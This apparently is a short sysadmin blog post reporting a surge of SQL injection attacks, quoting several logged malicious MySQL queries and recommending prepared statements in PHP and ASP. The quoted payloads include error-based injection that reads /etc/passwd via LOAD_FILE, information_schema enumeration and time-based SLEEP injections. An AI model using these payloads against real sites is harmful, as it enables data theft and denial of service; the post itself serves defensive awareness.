Increase in SQL injection attacks

Summer vacation’s over? More and more SQL injection attacks observed

Since a week or so, I notice a huge increase in SQL injection attacks on various websites. Anyone else seeing the same SQL injection attacks lately? This increased SQL injection activity – on various web sites and databases – has the following characteristics:

SQL injection attack characteristics

I quickly noticed the following characteristics in the attacks. Note the casing:

SELECT * FROM Figures WHERE tPath='1' and(SeLeCt 1 FrOm(SeLeCt count(*),CoNcAt((SeLeCt(SeLeCt CoNcAt(char(33,126,33),LoAd_fIlE(0x2f6574632f706173737764),char(33,126,33))) FrOm information_schema.TaBlEs LiMiT 0,1),floor(rand(0)*2))x FrOm information_schema.TaBlEs GrOuP By x)a) and '1'='1' ORDER BY ID_Figures DESC;
SELECT cnt_id, cnt_title, cnt_title_link, cnt_plaats, cnt_meta, cnt_content1, cnt_Publish, cnt_date_insert, cnt_laatste_bewerkt, keuze_afbeelding, Bnr_Visible_from, Bnr_Visible_till, Bnr_Visible_Unlimited FROM tbl_content WHERE Foobar and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from `information_schema`.columns where table_schema=0x696E666F726D6174696F6E5F736368656D61 and table_name=0x494E4E4F44425F4255464645525F504147455F4C5255 limit 12,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1 = 1 and cnt_Publish = 1 and ('2014-08-07 10:51:21' Between Bnr_Visible_from And Bnr_Visible_till or Bnr_Visible_Unlimited = 1) ORDER BY cnt_date_insert DESC LIMIT 0, 1;
SELECT * FROM course_offerings where courseID = '54' AnD sLeep(3) ANd '1';
SELECT * FROM course_offerings where ((courseTitle = '54' AnD sLeep(3) ANd '1') AND (courseType = 2));
SELECT page_content FROM pages WHERE page_name = 'weblog_en' AND SLEEP(3) oRDeR BY 1 #';

The sleep(3) in these SQL injection attacks is very nasty and leads to MySQL sleep() attacks, causing website and backend database-server Denial of Service attacks. This is something I’ve described earlier.

Therefore, in order to prevent SQL injection, it is very important to validate user supplied input in your PHP, classic ASP / VBScript, Perl and ASP.NET code! With PHP, use MySQLi or PHP Data Objects (PDO) to prepare SQL statements. In classic ASP / VBScript and ASP.NET, use the ADODB.Command object to prepare statements.

Read this too:   Count and display number of WordPress users in your Dashboard

Did this post helped you solve a problem? Or dit you find it interesting? Support Sysadmins of the North with a direct donation via Paypal of by bank wire transfer IBAN: NL31 ABNA 0432217258 (Jan Reilink). Just $ 5,- or € 5,- is more than enough, thanks!

Support SAOTN.ORG


150 views

Leave a Reply

Your email address will not be published. Required fields are marked *